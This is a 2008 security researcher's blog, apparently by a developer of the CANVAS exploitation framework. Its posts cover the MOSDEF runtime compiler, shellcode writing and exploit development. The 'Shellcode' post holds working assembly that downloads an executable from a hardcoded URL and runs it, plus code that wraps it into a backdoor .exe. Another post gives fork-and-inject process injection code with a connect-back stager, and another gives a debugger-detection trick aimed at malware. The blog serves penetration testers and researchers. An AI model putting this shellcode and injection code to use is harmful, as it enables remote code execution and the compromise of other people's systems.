Monday, August 25, 2008

That little thing called MOSDEF


In a previous post, I gave a small review of the concept behind MOSDEF. I explained that it is a runtime C compiler written in Python that builds shellcode for a bunch of architectures and operating systems, and that it is used in CANVAS as a post-exploitation platform.

Recently I have been writing a file browser. It's a simple task (especially if you have GUI skills, which I don't), and it has the advantage of showing all the potential that MOSDEF can bring to your framework, even more so if you compare it with an RPC-based one.

For the file browser, I obviously had to list directories (a feature we luckily already had). In an RPC environment, you would have to do something like this:

hFind = call("kernel32.dll!FindFirstFile", dir, &FindFileData)
print FindFileData.cFileName
while call("kernel32.dll!FindNextFile", hFind, &FindFileData) != 0:
    print FindFileData.cFileName

(In a *nix environment, you will need two system calls, getdents and stat)

It does look nice, but for each file in the directory you pay the latency of the remote call being sent and the result being returned over the wire (think of your target sitting in the remote forests of Xi'an).
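To put rough numbers on that, here is a back-of-the-envelope sketch in Python. The 300 ms round trip and the 500-entry directory are made-up figures and the function names are hypothetical. It also ignores the extra round trips needed to resolve function addresses the first time. The point is only that the RPC style pays one round trip per entry, while sending code once and streaming the results back pays roughly one per listing.

```python
def rpc_listing_seconds(entries: int, rtt: float) -> float:
    """One remote call (FindFirstFile/FindNextFile) per entry, plus the
    final FindNextFile call that reports there is nothing left."""
    return (entries + 1) * rtt


def single_shot_listing_seconds(rtt: float) -> float:
    """Send the code once, then stream every entry back: about one round trip."""
    return rtt


if __name__ == "__main__":
    rtt = 0.3        # assumed round-trip time in seconds
    entries = 500    # assumed number of files in the directory
    print("RPC style:   %.1f s" % rpc_listing_seconds(entries, rtt))
    print("single shot: %.1f s" % single_shot_listing_seconds(rtt))
```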

With MOSDEF, what you need instead is a small piece of C that does the same thing as the Python above, something like this:

vars={}
vars["dir"]=dir
code="""
#import "string","dir" as "dir"
#import "local","sendstring" as "sendstring"
#import "local","sendint" as "sendint"

#import "remote", "kernel32.dll|FindFirstFileA" as "FindFirstFile"

#import "remote", "kernel32.dll|FindNextFileA" as "FindNextFile"

#import "remote", "kernel32.dll|GetLastError" as "GetLastError"

struct FILETIME {
int dwLowDateTime; int dwHighDateTime; };
struct WIN32_FIND_DATA {
int dwFileAttributes;

struct FILETIME ftCreationTime;
struct FILETIME ftLastAccessTime;
struct FILETIME ftLastWriteTime;

int nFileSizeHigh; int nFileSizeLow;
int dwReserved0;
int dwReserved1;

char cFileName[260];

char cAlternateFileName[14];
};

void sendFILETIME(struct FILETIME *ft) {
sendint(ft->dwLowDateTime);

sendint(ft->dwHighDateTime);

}


void main() {
struct WIN32_FIND_DATA FindFileData;
int hFind;
int Error;
hFind = -1;
hFind = FindFirstFile(dir, &FindFileData);
if(hFind == -1) {
// Sending -1 means there are no more files to send
sendint(-1);
Error=GetLastError();
sendint(Error);
return 0;

} else {
sendint(FindFileData.dwFileAttributes);
sendint(FindFileData.nFileSizeLow);
sendFILETIME(&FindFileData.ftLastWriteTime);
sendstring(FindFileData.cFileName);
}

while (FindNextFile(hFind, &FindFileData) != 0) {
sendint(FindFileData.dwFileAttributes);
sendint(FindFileData.nFileSizeLow);
sendFILETIME(&FindFileData.ftLastWriteTime);
sendstring(FindFileData.cFileName);
}

Error = GetLastError();
sendint(-1);
sendint(Error); // if it is ERROR_NO_MORE_FILES, everything worked ok :>
}

"""
self.clearfunctioncache()
request=self.compile(code, vars)
self.sendrequest(request)
countfile=0

files=[]

while 1:
attr = sint32(self.readint())
[...]

Before you mention it or even think about it: yes, we call it "Cripple C" for a good reason.
Anyway, as you can imagine, this code gets compiled on your computer, and MOSDEF remotely resolves the addresses of the functions it needs. Here is the normal output you will see:

Dodir: C:\
kernel32.dll|FindFirstFileA not in cache - retrieving remotely.
Getprocaddr_withmalloc: Found kernel32.dll|FindFirstFileA at 7c813559
kernel32.dll|FindNextFileA not in cache - retrieving remotely.
Getprocaddr_withmalloc: Found kernel32.dll|FindNextFileA at 7c839019
kernel32.dll|GetLastError not in cache - retrieving remotely.
Getprocaddr_withmalloc: Found kernel32.dll|GetLastError at 7c910331

Once MOSDEF has all the addresses in its cache, it sends the piece of code, which gets executed. After that you just wait for the requested information to come back, parsed and ready to be used in your application.
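As an illustration of the receiving side, here is a minimal Python sketch that parses a stream shaped like the one the C code above produces: per entry, the attributes, the low size word, the two FILETIME words and the name, then a -1 followed by the error code. The wire format is an assumption made for this example (4-byte little-endian integers, length-prefixed strings) and the helper names are hypothetical. It is not the actual MOSDEF protocol or the CANVAS reading loop.

```python
import io
import struct

ERROR_NO_MORE_FILES = 18  # Win32 error code: the enumeration finished cleanly


def read_int(stream):
    """Read one signed 32-bit little-endian integer (assumed wire format)."""
    data = stream.read(4)
    if len(data) != 4:
        raise EOFError("stream ended in the middle of an integer")
    return struct.unpack("<i", data)[0]


def read_string(stream):
    """Read a length-prefixed byte string (assumed wire format)."""
    length = read_int(stream)
    data = stream.read(length)
    if len(data) != length:
        raise EOFError("stream ended in the middle of a string")
    return data.decode("latin-1")


def read_listing(stream):
    """Return (entries, error); each entry is (attributes, size, filetime, name)."""
    entries = []
    while True:
        attributes = read_int(stream)
        if attributes == -1:  # terminator: the next int is GetLastError()
            return entries, read_int(stream)
        size_low = read_int(stream)
        ft_low = read_int(stream) & 0xFFFFFFFF
        ft_high = read_int(stream) & 0xFFFFFFFF
        name = read_string(stream)
        entries.append((attributes, size_low, (ft_high << 32) | ft_low, name))


if __name__ == "__main__":
    # Hand-built stream with a single directory entry, then the terminator.
    raw = struct.pack("<iiii", 0x10, 0, 1, 2)
    raw += struct.pack("<i", 7) + b"WINDOWS"
    raw += struct.pack("<ii", -1, ERROR_NO_MORE_FILES)
    print(read_listing(io.BytesIO(raw)))
```

Checking that the trailing error code equals ERROR_NO_MORE_FILES is how the caller can tell a clean end of the listing from a real failure.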

Here is the scoop:



Note: Yes, sometimes I do this kind of job.

Thursday, August 21, 2008

Shellcode: You are doing it CORRECT


Recently I've been doing a lot of shellcode writing due to some special needs we had for some exploits (check the post "Apology of forking shellcode").

One of the things that gets me excited, other than finishing the citrix_metaframe bug, is the redesign of the shellcode framework that Bas did for the last release. The system is pretty simple to use and extend (I added a couple of features myself).

Instead of explaining the obvious, let me show you how it works with a simple example: a small shellcode that downloads a file to the IE cache and executes it.

As most of you know, CANVAS uses MOSDEF, a runtime compiler for a bunch of different operating systems and architectures (Linux x86, Linux SPARC, Linux PPC, Solaris SPARC, Solaris Intel, BSD, AIX, Win32, OSX x86, OSX PPC, etc). Explaining all the MOSDEF details can take a long time, and I usually enjoy my sleep. Let's go with some basics: MOSDEF is a C compiler written in Python, which means it has a syntax parser, an intermediate language, an assembler, etc. In this case we are gonna use the assembler to compile our shellcode.

Let's start from the beginning. The main class for shellcoding is basecode:

def httpcachedownload(self, urlfile):

codegen = basecode()

Once we have a basecode object, we need to tell it which win32 api functions we are gonna need. This basically adds a special stub that resolves each of those functions before our shellcode executes. (Function resolving is done by going through the PEB, checking the loaded dlls and comparing string names.)

codegen.find_function("kernel32.dll!loadlibrarya")
codegen.find_function("kernel32.dll!createprocessa")
codegen.find_function("kernel32.dll!exitthread")

Obviously, kernel32.dll is always loaded, but there are api functions that live in dlls which are not always loaded. Such is the case of UrlDownloadtoCacheFileA inside urlmon.dll, which is the function that is gonna do all the work for us. So what we need to do is, at resolving time, LoadLibrary urlmon.dll and then resolve UrlDownloadtoCacheFileA. It sounds hard, but it is simple with MOSDEF:

codegen.load_library('urlmon.dll')
codegen.find_function("urlmon.dll!urldownloadtocachefilea")

We have all our resolved hashes created; now we want to send an "argument" to our shellcode. For this special case we need the url where our .exe lives, so we are gonna add a global variable named URLNAME and pass it our url:

codegen._globals.addString("URLNAME", urlfile)

Now we need the actual code. Yeah, it's a simple framework, but we cannot escape from coding the actual assembly:

codegen.main = """
xorl %eax, %eax
mov $0x208, %edx
//movl %ecx, %edx
sub %edx, %esp
movl %esp, %esi

leal URLNAME-getpcloc(%ebp),%edi // Note how simple we load the
// given argument
pushl %esi
// BATCHCODE
// ------

pushl %eax // pBSC
pushl %eax // dwReserved
pushl %edx // dwBufLength
pushl %esi // szFileName
pushl %edi // URL
pushl %eax // lpUnkCaller
call URLDOWNLOADTOCACHEFILEA-getpcloc(%ebp) // Calling a function
// needs the name
// with caps.
// returns an HRESULT

pop %esi // get the file back

xorl %eax, %eax
movl $0x100, %ecx
subl %ecx, %esp
movl %esp, %edi // CLEAR the buffer
rep stosb

leal 16(%esp), %ecx
leal 84(%esp), %edx
mov $0x1, 0x2c(%edx)

pushl %ecx // PROCESS INFORMATION
pushl %edx // STARTUP INFO
pushl %eax
pushl %eax
pushl %eax // Creation Flag
pushl %eax
pushl %eax
pushl %eax
pushl %esi // command
pushl %eax
call CREATEPROCESSA-getpcloc(%ebp)
xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)
"""

Quite simple, isn't it? We call UrlDownloadtoCacheFileA with the given url; it returns the place where it saved the downloaded file in the szFileName argument (reg %esi), and later we simply call CreateProcessA.
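One detail worth spelling out is the order of the pushes: with the stdcall convention the arguments go on the stack from last to first, which is why pBSC is pushed first and lpUnkCaller last. The Python helper below is a hypothetical illustration (it is not part of CANVAS or MOSDEF) that takes the arguments in prototype order and emits the push sequence plus the upper-case call label used in the listing above.

```python
def stdcall_sequence(function, args):
    """Build assembly lines for a stdcall call.

    args is a list of (operand, comment) pairs in prototype order;
    the pushes are emitted in reverse, followed by the call itself.
    """
    lines = ["pushl %s // %s" % (operand, comment)
             for operand, comment in reversed(args)]
    # The listing above refers to resolved functions by their upper-case name.
    lines.append("call %s-getpcloc(%%ebp)" % function.upper())
    return lines


if __name__ == "__main__":
    # Arguments of URLDownloadToCacheFileA in prototype order.
    url_args = [
        ("%eax", "lpUnkCaller"),
        ("%edi", "URL"),
        ("%esi", "szFileName"),
        ("%edx", "dwBufLength"),
        ("%eax", "dwReserved"),
        ("%eax", "pBSC"),
    ]
    print("\n".join(stdcall_sequence("urldownloadtocachefilea", url_args)))
```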

Before I get any comment bitching about how this code can be optimized: I KNOW, I just didn't do it yet.

So the last thing we need is to return the assembly code formatted:

return codegen.get()


From your exploit, you can go like:

import shellcode.clean.windows.payloads as payloads
p = payloads.payloads()
code = p.httpdownload("http://172.16.71.2:8080/file.exe")
sc = p.assemble( code )

sc now holds your shellcode. If you want to test it in a debugger without exploiting something, or you just want to make a backdoor out of it:

import MOSDEF.pelib as pelib
myPElib = pelib.PElib()
exe = myPElib.createPEFileBuf(sc, gui=True)
file = open('test.exe', 'wb+')
file.write(exe)
file.close()


Peace

Sunday, August 17, 2008

Things you care about if you are writing malware...


There are millions of ways to detect a debugger. I'm usually on the other side, "millions of ways to hide a debugger", but this time let me show you a simple but neat trick.
Call the win32 api function GetCommandLine and check if the last char is a space.
If it isn't, it means the process has been executed from a debugger (tested on ID and windbg) or the command shell.


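LPSTR ptr;
size_t len;

ptr = GetCommandLineA(); // ANSI variant, so the LPSTR type matches even in UNICODE builds
len = strlen(ptr);
if(len > 0 && ptr[len-1] == ' ') // guard against an empty command line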
printf("Carry On\n");
else
printf("Debugger detected!\n");
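The same check can be sketched in Python, keeping the decision separate from the Windows call so the logic can be tried anywhere. The function names are hypothetical. When run this way the process being examined is python.exe, so the result reflects how the interpreter itself was launched.

```python
import ctypes
import sys


def looks_debugged(command_line: bytes) -> bool:
    """Apply the heuristic: no trailing space means debugger or command shell."""
    return not command_line.endswith(b" ")


def current_command_line() -> bytes:
    """Fetch the raw command line through GetCommandLineA (Windows only)."""
    get_command_line = ctypes.windll.kernel32.GetCommandLineA
    get_command_line.restype = ctypes.c_char_p
    return get_command_line()


if __name__ == "__main__" and sys.platform == "win32":
    if looks_debugged(current_command_line()):
        print("Debugger detected!")
    else:
        print("Carry On")
```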

In other news, if you feel like having a good cabernet sauvignon, a juicy steak, or listening to hackers talk about what they know, Buenos Aires is your place the first days of October:
cansecwest's dragos is throwing a conference this year: Ba-Con
And exactly the day after comes the second edition of the Eko-party, including Dave Aitel's keynote "Hacking Has An Economy of Scale" and Pablo Solé's recon talk "Adobe javascript unleashed".

I'll be around!

Friday, August 15, 2008

deep deep...

What's lower than stealing a bug from someone and publishing it?

Stealing a NULL pointer read...

http://www.nullcode.com.ar/ncs/crash/nsloo.htm*

You must be starving for fame, go fuzz an AV!


* The bug on that website was found by raddy a long time ago

Thursday, August 7, 2008

The exploit development's moebius strip

Let me talk a little about one of my main tasks at Immunity: solving complex problems. Solving complex problems is an important and interesting job, especially for curious minds that enjoy the masochistic task of facing difficult challenges every day.


On the opposite side of all that excitement, you go through a series of moods at the different steps of the problem, which I have named "the exploit development's circle"...

EXCITEMENT: It begins with excitement about the new challenge you will be facing. You set up your environment and start getting familiar with all the details.

DISAPPOINTMENT: With all the adrenaline flowing through your veins, your face hits directly into a wall. The challenge seems to be more complex than expected, and all the usual hopes of success get lower every minute.

DEPRESSION: After days of failure, and after using all your experience and your brain cells, the exploit remains exactly the same as on the first day. The adrenaline in the blood is replaced by epic amounts of caffeine; you go to sleep and all you can think of is the time spent on a bug that you might not be able to exploit.

FAITH: You tell your boss this is impossible, that we need to switch to something else. He persistently gives you support, but your ears are too busy listening to your psychological repression mechanism telling you how bad you are at this, and that you should apply for a job that requires less mental effort, such as clerk in your local video store. A millisecond before quitting this module for good, an idea emerges. You are not certain where it came from: maybe it was a signal sent by old Tiresias that you subconsciously read in the pigeons' flight outside your window, or your last neuron burning the last portion of energy left, but the truth is that your idea might work.

SUCCESS: It works! Your last-minute theory works. All the glory, the little pieces of colorful paper dancing in the air, the clowns, the trumpets. Your exploit is working and the cold sweat is now gone. After all the congratulations, with your self-esteem over the clouds, and after the routine testing (which you know is gonna go successfully), your 15 minutes of glory will be long gone and the next task will bring the circle back to where it started.


Tuesday, August 5, 2008

Apology of forking shellcode

*Note: To practice my writing I will start doing random posts in English, most of them related to computers.*

I remember back in the day, when Dave was trying to chill out from a hard day of work, he started to do a simple "half an hour" hoolio (in Immunity's slang, a hoolio is an exploit for bizarre software, named after -Julio FTP Server-), and so he started on savant. For those who never exploited it: it takes a bit more than half an hour. Refer to Advance Stack Overflow.


The last thing I did was fully port the neat exploit that Brett Moore did for Syscan to CANVAS. It's a really interesting bug and a good proof of concept for windows 2003 exploitation (starting today, we are gonna include it in the Heap overflow training). I'm not gonna get into the details since Brett covered them all; I just wanna state that it is a nice bug, and with some work it can be exploited quite reliably. The problem was different this time: Shellcode.

The big problem with shellcode execution is that the heap is screwed by whatever primitive you use, so it will eventually crash on an allocation. It can be fixed, but you will never be 100% sure that you did it correctly, and you will probably end up with a big shellcode.

Our usual response to this problem is -Process Injection-. Bas (also known as The great Bas Alberts) wrote a great shellcode a couple of years ago, which injects mosdef shellcode into whatever process is given and executes the connect back. We tag-teamed a little bit on this exploit before he left, to reduce the shellcode size (since I only had around 0x300 bytes).

I did all of this without checking the thread privileges (kids, don't do that at home, we are security professionals trained to make such dumb mistakes), so when I ran my exploit nothing significant happened.

Since I believe in science, I looked for the causes, and this time I found the worst: I didn't have the SeDebugPrivilege. Usually it is disabled, and you can easily enable it with a couple of lines of assembly, but this time it was not there. In simple words:
Good bye Inject shellcode, Welcome trouble.

Next step, ForkLoad shellcode. We had a template of what was supposed to be a fork shellcode, but it was never finished, and so that was my task for the last couple of days. (Sheesh, I did all this write-up to get to this point.)

In 2003 the Last Stage of Delirium group released a paper on win32 shellcode in which, among other amazing tricks, they talk about a Fork Load shellcode. They made it look simple:

1) Create the process in Suspended Mode

STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ctx;
CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

2) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.hThread, &ctx);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Make the thread's EIP point to our shellcode

ctx.ContextFlags = CONTEXT_FULL;
ctx.Eip = (DWORD)v;
SetThreadContext( pi.hThread, &ctx);

5) Since the thread is in SUSPENDED MODE, resume execution

ResumeThread(pi.hThread);


The injected shellcode will work perfectly, as long as it does simple things. You will have kernel32.dll and ntdll.dll loaded (but not initialized), so depending on what the shellcode does, you might end up crashing on the use of a non-initialized critical section, or on other similar behaviour.

To fix it, we have to do a couple of tweaks. Let me show you some code:

1) You need to distinguish whether you are the forking or the forked process. We did that with some simple self-modifying code:

forkentry:
// if this marker is cleared this jmps to forkthis:
// we copy this entire payload over ;)
xorl %eax, %eax
incl %eax
test %eax,%eax
jz forkthis

// start of self modifying muck

// Self modifying code, change the incl for a nop
leal forkentry-getpcloc(%ebp),%ecx
movb $0x90, 2(%ecx) // 2(%ecx) points to the incl %eax

2) CreateProcess in suspended-mode

CreateProcess(NULL, "cmd", NULL, NULL, 0, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

3) Remote VirtualAllocate and Write our shellcode there.

v = VirtualAllocEx( pi.hProcess, NULL, 0x5000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory( pi.hProcess, v, buf, sizeof(buf), NULL);

4) Get Full context of the main thread

ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.hThread, &ctx);

5) Create a Remote Thread and run it

CreateRemoteThread( hProcess, 0, 0, shellcode, 0, 0,0)

6) Resume execution of the main thread.

// pi.hThread
pushl %esi
call RESUMETHREAD-getpcloc(%ebp)

7a) If you are forking, exitthread

xorl %eax,%eax
pushl %eax
call EXITTHREAD-getpcloc(%ebp)

7b) If you are forked, sleep for a few seconds (0x1000 ms, roughly four) to let the main thread initialize everything

kernel32.dll!Sleep( 0x1000)


And that takes around 0x2cd bytes (It can be optimized), including:
- LoadLibrary("WS2_32.dll")
- Resolving WS2_32.dll!wsastartup and calling it
- and including the first-stage mosdef shellcode (socket/connect/recv).
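
The self-modifying marker from step 1 is easy to misread, so here is a small Python simulation of it. The byte values are one possible encoding of those four instructions (an assembler may pick a different opcode for the xor), and the tiny interpreter is only an illustration, not MOSDEF code. The first run falls through to the forking path and patches the incl into a nop. The copy written to the child therefore takes the jz to forkthis.

```python
# One possible encoding of the first instructions of forkentry (x86, 32-bit).
FORKENTRY = bytes([
    0x31, 0xC0,   # xorl %eax, %eax
    0x40,         # incl %eax        <- the marker, at offset 2
    0x85, 0xC0,   # test %eax, %eax
    0x74, 0x00,   # jz forkthis      (displacement is a placeholder)
])


def clear_marker(code: bytes) -> bytes:
    """Do what 'movb $0x90, 2(%ecx)' does: overwrite the incl with a nop."""
    patched = bytearray(code)
    patched[2] = 0x90
    return bytes(patched)


def takes_forkthis_branch(code: bytes) -> bool:
    """Tiny interpreter for the instructions above; True if the jz is taken."""
    eax, zero_flag, pc = 0xDEADBEEF, False, 0
    while pc < len(code):
        op = code[pc]
        if op == 0x31 and code[pc + 1] == 0xC0:      # xor eax, eax
            eax, pc = 0, pc + 2
        elif op == 0x40:                             # inc eax
            eax, pc = (eax + 1) & 0xFFFFFFFF, pc + 1
        elif op == 0x90:                             # nop
            pc += 1
        elif op == 0x85 and code[pc + 1] == 0xC0:    # test eax, eax
            zero_flag, pc = (eax == 0), pc + 2
        elif op == 0x74:                             # jz rel8
            return zero_flag
        else:
            raise ValueError("unexpected opcode 0x%02x" % op)
    return False


if __name__ == "__main__":
    print("forking process jumps to forkthis:", takes_forkthis_branch(FORKENTRY))
    print("forked copy jumps to forkthis:    ",
          takes_forkthis_branch(clear_marker(FORKENTRY)))
```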


All the kudos to Bas and his recent rewrite of our shellcode framework, which made this a smoother experience.